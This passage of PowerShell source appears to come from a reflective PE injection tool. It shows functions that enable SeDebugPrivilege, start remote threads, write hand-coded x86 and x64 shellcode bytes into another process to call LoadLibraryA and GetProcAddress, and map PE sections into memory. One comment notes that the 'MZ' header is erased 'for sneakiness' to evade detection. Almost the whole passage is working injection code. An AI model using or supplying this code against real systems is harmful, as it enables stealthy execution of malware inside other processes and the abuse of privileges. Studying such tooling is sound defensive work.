   if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN)\n            {\n                $Result = $Win32Functions.ImpersonateSelf.Invoke(3)\n                if ($Result -eq $false)\n                {\n                    Throw \"Unable to impersonate self\"\n                }\n\n                $Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)\n                if ($Result -eq $false)\n                {\n                    Throw \"Unable to OpenThreadToken.\"\n                }\n            }\n            else\n            {\n                Throw \"Unable to OpenThreadToken. Error code: $ErrorCode\"\n            }\n        }\n\n        [IntPtr]$PLuid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.LUID))\n        $Result = $Win32Functions.LookupPrivilegeValue.Invoke($null, \"SeDebugPrivilege\", $PLuid)\n        if ($Result -eq $false)\n        {\n            Throw \"Unable to call LookupPrivilegeValue\"\n        }\n\n        [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.TOKEN_PRIVILEGES)\n        [IntPtr]$TokenPrivilegesMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize)\n        $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesMem, [Type]$Win32Types.TOKEN_PRIVILEGES)\n        $TokenPrivileges.PrivilegeCount = 1\n        $TokenPrivileges.Privileges.Luid = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PLuid, [Type]$Win32Types.LUID)\n        $TokenPrivileges.Privileges.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED\n        [System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenPrivileges, $TokenPrivilegesMem, $true)\n\n        $Result = $Win32Functions.AdjustTokenPrivileges.Invoke($ThreadToken, $false, $TokenPrivilegesMem, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero)\n        $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() #Need this to get success value or failure value\n        if (($Result -eq $false) -or ($ErrorCode -ne 0))\n        {\n            #Throw \"Unable to call AdjustTokenPrivileges. Return value: $Result, Errorcode: $ErrorCode\"   #todo need to detect if already set\n        }\n\n        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)\n    }\n\n    Function Create-RemoteThread\n    {\n        Param(\n        [Parameter(Position = 1, Mandatory = $true)]\n        [IntPtr]\n        $ProcessHandle,\n\n        [Parameter(Position = 2, Mandatory = $true)]\n        [IntPtr]\n        $StartAddress,\n\n        [Parameter(Position = 3, Mandatory = $false)]\n        [IntPtr]\n        $ArgumentPtr = [IntPtr]::Zero,\n\n        [Parameter(Position = 4, Mandatory = $true)]\n        [System.Object]\n        $Win32Functions\n        )\n\n        [IntPtr]$RemoteThreadHandle = [IntPtr]::Zero\n\n        $OSVersion = [Environment]::OSVersion.Version\n        #Vista and Win7\n        if (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2)))\n        {\n            #Write-Verbose \"Windows Vista/7 detected, using NtCreateThreadEx. Address of thread: $StartAddress\"\n            $RetVal= $Win32Functions.NtCreateThreadEx.Invoke([Ref]$RemoteThreadHandle, 0x1FFFFF, [IntPtr]::Zero, $ProcessHandle, $StartAddress, $ArgumentPtr, $false, 0, 0xffff, 0xffff, [IntPtr]::Zero)\n            $LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            if ($RemoteThreadHandle -eq [IntPtr]::Zero)\n            {\n                Throw \"Error in NtCreateThreadEx. Return value: $RetVal. LastError: $LastError\"\n            }\n        }\n        #XP/Win8\n        else\n        {\n            #Write-Verbose \"Windows XP/8 detected, using CreateRemoteThread. Address of thread: $StartAddress\"\n            $RemoteThreadHandle = $Win32Functions.CreateRemoteThread.Invoke($ProcessHandle, [IntPtr]::Zero, [UIntPtr][UInt64]0xFFFF, $StartAddress, $ArgumentPtr, 0, [IntPtr]::Zero)\n        }\n\n        if ($RemoteThreadHandle -eq [IntPtr]::Zero)\n        {\n            Write-Error \"Error creating remote thread, thread handle is null\" -ErrorAction Stop\n        }\n\n        return $RemoteThreadHandle\n    }\n\n    Function Get-ImageNtHeaders\n    {\n        Param(\n        [Parameter(Position = 0, Mandatory = $true)]\n        [IntPtr]\n        $PEHandle,\n\n        [Parameter(Position = 1, Mandatory = $true)]\n        [System.Object]\n        $Win32Types\n        )\n\n        $NtHeadersInfo = New-Object System.Object\n\n        #Normally would validate DOSHeader here, but we did it before this function was called and then destroyed 'MZ' for sneakiness\n        $dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, [Type]$Win32Types.IMAGE_DOS_HEADER)\n\n        #Get IMAGE_NT_HEADERS\n        [IntPtr]$NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$dosHeader.e_lfanew))\n        $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value $NtHeadersPtr\n        $imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS64)\n\n        #Make sure the IMAGE_NT_HEADERS checks out. If it doesn't, the data structure is invalid. This should never happen.\n        if ($imageNtHeaders64.Signature -ne 0x00004550)\n        {\n            throw \"Invalid IMAGE_NT_HEADER signature.\"\n        }\n\n        if ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC')\n        {\n            $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders64\n            $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $true\n        }\n        else\n        {\n            $ImageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS32)\n            $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders32\n            $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $false\n        }\n\n        return $NtHeadersInfo\n    }\n\n\n    #This function will get the information needed to allocated space in memory for the PE\n    Function Get-PEBasicInfo\n    {\n        Param(\n        [Parameter( Position = 0, Mandatory = $true )]\n        [Byte[]]\n        $PEBytes,\n\n        [Parameter(Position = 1, Mandatory = $true)]\n        [System.Object]\n        $Win32Types\n        )\n\n        $PEInfo = New-Object System.Object\n\n        #Write the PE to memory temporarily so I can get information from it. This is not it's final resting spot.\n        [IntPtr]$UnmanagedPEBytes = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PEBytes.Length)\n        [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $UnmanagedPEBytes, $PEBytes.Length) | Out-Null\n\n        #Get NtHeadersInfo\n        $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $UnmanagedPEBytes -Win32Types $Win32Types\n\n        #Build a structure with the information which will be needed for allocating memory and writing the PE to memory\n        $PEInfo | Add-Member -MemberType NoteProperty -Name 'PE64Bit' -Value ($NtHeadersInfo.PE64Bit)\n        $PEInfo | Add-Member -MemberType NoteProperty -Name 'OriginalImageBase' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.ImageBase)\n        $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)\n        $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfHeaders' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders)\n        $PEInfo | Add-Member -MemberType NoteProperty -Name 'DllCharacteristics' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.DllCharacteristics)\n\n        #Free the memory allocated above, this isn't where we allocate the PE to memory\n        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($UnmanagedPEBytes)\n\n        return $PEInfo\n    }\n\n\n    #PEInfo must contain the following NoteProperties:\n    #   PEHandle: An IntPtr to the address the PE is loaded to in memory\n    Function Get-PEDetailedInfo\n    {\n        Param(\n        [Parameter( Position = 0, Mandatory = $true)]\n        [IntPtr]\n        $PEHandle,\n\n        [Parameter(Position = 1, Mandatory = $true)]\n        [System.Object]\n        $Win32Types,\n\n        [Parameter(Position = 2, Mandatory = $true)]\n        [System.Object]\n        $Win32Constants\n        )\n\n        if ($PEHandle -eq $null -or $PEHandle -eq [IntPtr]::Zero)\n        {\n            throw 'PEHandle is null or IntPtr.Zero'\n        }\n\n        $PEInfo = New-Object System.Object\n\n        #Get NtHeaders information\n        $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $PEHandle -Win32Types $Win32Types\n\n        #Build the PEInfo object\n        $PEInfo | Add-Member -MemberType NoteProperty -Name PEHandle -Value $PEHandle\n        $PEInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ($NtHeadersInfo.IMAGE_NT_HEADERS)\n        $PEInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value ($NtHeadersInfo.NtHeadersPtr)\n        $PEInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value ($NtHeadersInfo.PE64Bit)\n        $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)\n\n        if ($PEInfo.PE64Bit -eq $true)\n        {\n            [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS64)))\n            $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr\n        }\n        else\n        {\n            [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS32)))\n            $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr\n        }\n\n        if (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_DLL) -eq $Win32Constants.IMAGE_FILE_DLL)\n        {\n            $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'DLL'\n        }\n        elseif (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) -eq $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE)\n        {\n            $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'EXE'\n        }\n        else\n        {\n            Throw \"PE file is not an EXE or DLL\"\n        }\n\n        return $PEInfo\n    }\n\n    Function Import-DllInRemoteProcess\n    {\n        Param(\n        [Parameter(Position=0, Mandatory=$true)]\n        [IntPtr]\n        $RemoteProcHandle,\n\n        [Parameter(Position=1, Mandatory=$true)]\n        [IntPtr]\n        $ImportDllPathPtr\n        )\n\n        $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])\n\n        $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)\n        $DllPathSize = [UIntPtr][UInt64]([UInt64]$ImportDllPath.Length + 1)\n        $RImportDllPathPtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n        if ($RImportDllPathPtr -eq [IntPtr]::Zero)\n        {\n            Throw \"Unable to allocate memory in the remote process\"\n        }\n\n        [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero\n        $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RImportDllPathPtr, $ImportDllPathPtr, $DllPathSize, [Ref]$NumBytesWritten)\n\n        if ($Success -eq $false)\n        {\n            Throw \"Unable to write DLL path to remote process memory\"\n        }\n        if ($DllPathSize -ne $NumBytesWritten)\n        {\n            Throw \"Didn't write the expected amount of bytes when writing a DLL path to load to the remote process\"\n        }\n\n        $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"kernel32.dll\")\n        $LoadLibraryAAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"LoadLibraryA\") #Kernel32 loaded to the same address for all processes\n\n        [IntPtr]$DllAddress = [IntPtr]::Zero\n        #For 64bit DLL's, we can't use just CreateRemoteThread to call LoadLibrary because GetExitCodeThread will only give back a 32bit value, but we need a 64bit address\n        #   Instead, write shellcode while calls LoadLibrary and writes the result to a memory address we specify. Then read from that memory once the thread finishes.\n        if ($PEInfo.PE64Bit -eq $true)\n        {\n            #Allocate memory for the address returned by LoadLibraryA\n            $LoadLibraryARetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n            if ($LoadLibraryARetMem -eq [IntPtr]::Zero)\n            {\n                Throw \"Unable to allocate memory in the remote process for the return value of LoadLibraryA\"\n            }\n\n            #Write Shellcode to the remote process which will call LoadLibraryA (Shellcode: LoadLibraryA.asm)\n            $LoadLibrarySC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)\n            $LoadLibrarySC2 = @(0x48, 0xba)\n            $LoadLibrarySC3 = @(0xff, 0xd2, 0x48, 0xba)\n            $LoadLibrarySC4 = @(0x48, 0x89, 0x02, 0x48, 0x89, 0xdc, 0x5b, 0xc3)\n\n            $SCLength = $LoadLibrarySC1.Length + $LoadLibrarySC2.Length + $LoadLibrarySC3.Length + $LoadLibrarySC4.Length + ($PtrSize * 3)\n            $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)\n            $SCPSMemOriginal = $SCPSMem\n\n            Write-BytesToMemory -Bytes $LoadLibrarySC1 -MemoryAddress $SCPSMem\n            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC1.Length)\n            [System.Runtime.InteropServices.Marshal]::StructureToPtr($RImportDllPathPtr, $SCPSMem, $false)\n            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n            Write-BytesToMemory -Bytes $LoadLibrarySC2 -MemoryAddress $SCPSMem\n            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC2.Length)\n            [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryAAddr, $SCPSMem, $false)\n            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n            Write-BytesToMemory -Bytes $LoadLibrarySC3 -MemoryAddress $SCPSMem\n            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC3.Length)\n            [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryARetMem, $SCPSMem, $false)\n            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n            Write-BytesToMemory -Bytes $LoadLibrarySC4 -MemoryAddress $SCPSMem\n            $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC4.Length)\n\n            $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n            if ($RSCAddr -eq [IntPtr]::Zero)\n            {\n                Throw \"Unable to allocate memory in the remote process for shellcode\"\n            }\n\n            $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)\n            if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))\n            {\n                Throw \"Unable to write shellcode to remote process memory.\"\n            }\n\n            $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions\n            $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)\n            if ($Result -ne 0)\n            {\n                Throw \"Call to CreateRemoteThread to call GetProcAddress failed.\"\n            }\n\n            #The shellcode writes the DLL address to memory in the remote process at address $LoadLibraryARetMem, read this memory\n            [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)\n            $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $LoadLibraryARetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)\n            if ($Result -eq $false)\n            {\n                Throw \"Call to ReadProcessMemory failed\"\n            }\n            [IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])\n\n            $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $LoadLibraryARetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n            $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n        }\n        else\n        {\n            [IntPtr]$RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $LoadLibraryAAddr -ArgumentPtr $RImportDllPathPtr -Win32Functions $Win32Functions\n            $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)\n            if ($Result -ne 0)\n            {\n                Throw \"Call to CreateRemoteThread to call GetProcAddress failed.\"\n            }\n\n            [Int32]$ExitCode = 0\n            $Result = $Win32Functions.GetExitCodeThread.Invoke($RThreadHandle, [Ref]$ExitCode)\n            if (($Result -eq 0) -or ($ExitCode -eq 0))\n            {\n                Throw \"Call to GetExitCodeThread failed\"\n            }\n\n            [IntPtr]$DllAddress = [IntPtr]$ExitCode\n        }\n\n        $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RImportDllPathPtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\n        return $DllAddress\n    }\n\n    Function Get-RemoteProcAddress\n    {\n        Param(\n        [Parameter(Position=0, Mandatory=$true)]\n        [IntPtr]\n        $RemoteProcHandle,\n\n        [Parameter(Position=1, Mandatory=$true)]\n        [IntPtr]\n        $RemoteDllHandle,\n\n        [Parameter(Position=2, Mandatory=$true)]\n        [IntPtr]\n        $FunctionNamePtr,#This can either be a ptr to a string which is the function name, or, if LoadByOrdinal is 'true' this is an ordinal number (points to nothing)\n\n        [Parameter(Position=3, Mandatory=$true)]\n        [Bool]\n        $LoadByOrdinal\n        )\n\n        $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])\n\n        [IntPtr]$RFuncNamePtr = [IntPtr]::Zero   #Pointer to the function name in remote process memory if loading by function name, ordinal number if loading by ordinal\n        #If not loading by ordinal, write the function name to the remote process memory\n        if (-not $LoadByOrdinal)\n        {\n            $FunctionName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($FunctionNamePtr)\n\n            #Write FunctionName to memory (will be used in GetProcAddress)\n            $FunctionNameSize = [UIntPtr][UInt64]([UInt64]$FunctionName.Length + 1)\n            $RFuncNamePtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $FunctionNameSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n            if ($RFuncNamePtr -eq [IntPtr]::Zero)\n            {\n                Throw \"Unable to allocate memory in the remote process\"\n            }\n\n            [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero\n            $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RFuncNamePtr, $FunctionNamePtr, $FunctionNameSize, [Ref]$NumBytesWritten)\n            if ($Success -eq $false)\n            {\n                Throw \"Unable to write DLL path to remote process memory\"\n            }\n            if ($FunctionNameSize -ne $NumBytesWritten)\n            {\n                Throw \"Didn't write the expected amount of bytes when writing a DLL path to load to the remote process\"\n            }\n        }\n        #If loading by ordinal, just set RFuncNamePtr to be the ordinal number\n        else\n        {\n            $RFuncNamePtr = $FunctionNamePtr\n        }\n\n        #Get address of GetProcAddress\n        $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"kernel32.dll\")\n        $GetProcAddressAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"GetProcAddress\") #Kernel32 loaded to the same address for all processes\n\n        #Allocate memory for the address returned by GetProcAddress\n        $GetProcAddressRetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UInt64][UInt64]$PtrSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n        if ($GetProcAddressRetMem -eq [IntPtr]::Zero)\n        {\n            Throw \"Unable to allocate memory in the remote process for the return value of GetProcAddress\"\n        }\n\n        #Write Shellcode to the remote process which will call GetProcAddress\n        #Shellcode: GetProcAddress.asm\n        [Byte[]]$GetProcAddressSC = @()\n        if ($PEInfo.PE64Bit -eq $true)\n        {\n            $GetProcAddressSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)\n            $GetProcAddressSC2 = @(0x48, 0xba)\n            $GetProcAddressSC3 = @(0x48, 0xb8)\n            $GetProcAddressSC4 = @(0xff, 0xd0, 0x48, 0xb9)\n            $GetProcAddressSC5 = @(0x48, 0x89, 0x01, 0x48, 0x89, 0xdc, 0x5b, 0xc3)\n        }\n        else\n        {\n            $GetProcAddressSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xc0, 0xb8)\n            $GetProcAddressSC2 = @(0xb9)\n            $GetProcAddressSC3 = @(0x51, 0x50, 0xb8)\n            $GetProcAddressSC4 = @(0xff, 0xd0, 0xb9)\n            $GetProcAddressSC5 = @(0x89, 0x01, 0x89, 0xdc, 0x5b, 0xc3)\n        }\n        $SCLength = $GetProcAddressSC1.Length + $GetProcAddressSC2.Length + $GetProcAddressSC3.Length + $GetProcAddressSC4.Length + $GetProcAddressSC5.Length + ($PtrSize * 4)\n        $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)\n        $SCPSMemOriginal = $SCPSMem\n\n        Write-BytesToMemory -Bytes $GetProcAddressSC1 -MemoryAddress $SCPSMem\n        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC1.Length)\n        [System.Runtime.InteropServices.Marshal]::StructureToPtr($RemoteDllHandle, $SCPSMem, $false)\n        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n        Write-BytesToMemory -Bytes $GetProcAddressSC2 -MemoryAddress $SCPSMem\n        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC2.Length)\n        [System.Runtime.InteropServices.Marshal]::StructureToPtr($RFuncNamePtr, $SCPSMem, $false)\n        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n        Write-BytesToMemory -Bytes $GetProcAddressSC3 -MemoryAddress $SCPSMem\n        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC3.Length)\n        [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressAddr, $SCPSMem, $false)\n        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n        Write-BytesToMemory -Bytes $GetProcAddressSC4 -MemoryAddress $SCPSMem\n        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC4.Length)\n        [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressRetMem, $SCPSMem, $false)\n        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n        Write-BytesToMemory -Bytes $GetProcAddressSC5 -MemoryAddress $SCPSMem\n        $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC5.Length)\n\n        $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n        if ($RSCAddr -eq [IntPtr]::Zero)\n        {\n            Throw \"Unable to allocate memory in the remote process for shellcode\"\n        }\n        [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero\n        $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)\n        if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))\n        {\n            Throw \"Unable to write shellcode to remote process memory.\"\n        }\n\n        $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions\n        $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)\n        if ($Result -ne 0)\n        {\n            Throw \"Call to CreateRemoteThread to call GetProcAddress failed.\"\n        }\n\n        #The process address is written to memory in the remote process at address $GetProcAddressRetMem, read this memory\n        [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)\n        $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $GetProcAddressRetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)\n        if (($Result -eq $false) -or ($NumBytesWritten -eq 0))\n        {\n            Throw \"Call to ReadProcessMemory failed\"\n        }\n        [IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])\n\n        #Cleanup remote process memory\n        $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n        $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $GetProcAddressRetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\n        if (-not $LoadByOrdinal)\n        {\n            $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RFuncNamePtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n        }\n\n        return $ProcAddress\n    }\n\n\n    Function Copy-Sections\n    {\n        Param(\n        [Parameter(Position = 0, Mandatory = $true)]\n        [Byte[]]\n        $PEBytes,\n\n        [Parameter(Position = 1, Mandatory = $true)]\n        [System.Object]\n        $PEInfo,\n\n        [Parameter(Position = 2, Mandatory = $true)]\n        [System.Object]\n        $Win32Functions,\n\n        [Parameter(Position = 3, Mandatory = $true)]\n        [System.Object]\n        $Win32Types\n        )\n\n        for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)\n        {\n            [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))\n            $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)\n\n            #Address to copy the section to\n            [IntPtr]$SectionDestAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$SectionHeader.VirtualAddress))\n\n            #SizeOfRawData is the size of the data on disk, VirtualSize is the minimum space that can be allocated\n            #    in memory for the section. If VirtualSize > SizeOfRawData, pad the extra spaces with 0. If\n            #    SizeOfRawData > VirtualSize, it is because the section stored on disk has padding that we can throw away,\n            #    so truncate SizeOfRawData to VirtualSize\n            $SizeOfRawData = $SectionHeader.SizeOfRawData\n\n            if ($SectionHeader.PointerToRawData -eq 0)\n            {\n                $SizeOfRawData = 0\n            }\n\n            if ($SizeOfRawData -gt $SectionHeader.VirtualSize)\n            {\n                $SizeOfRawData = $SectionHeader.VirtualSize\n            }\n\n            if ($SizeOfRawData -gt 0)\n            {\n                Test-MemoryRangeValid -DebugString \"Copy-Sections::MarshalCopy\" -PEInfo $PEInfo -StartAddress $SectionDestAddr -Size $SizeOfRawData | Out-Null\n                [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, [Int32]$SectionHeader.PointerToRawData, $SectionDestAddr, $SizeOfRawData)\n            }\n\n            #If SizeOfRawData is less than VirtualSize, set memory to 0 for the extra space\n            if ($SectionHeader.SizeOfRawData -lt $SectionHeader.VirtualSize)\n            {\n                $Difference = $SectionHeader.VirtualSize - $SizeOfRawData\n                [IntPtr]$StartAddress = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$SectionDestAddr) ([Int64]$SizeOfRawData))\n                Test-MemoryRangeValid -DebugString \"Copy-Sections::Memset\" -PEInfo $PEInfo -StartAddress $StartAddress -Size $Difference | Out-Null\n                $Win32Functions.memset.Invoke($StartAddress, 0, [IntPtr]$Difference) | Out-Null\n            }\n        }\n    }\n\n\n    Function 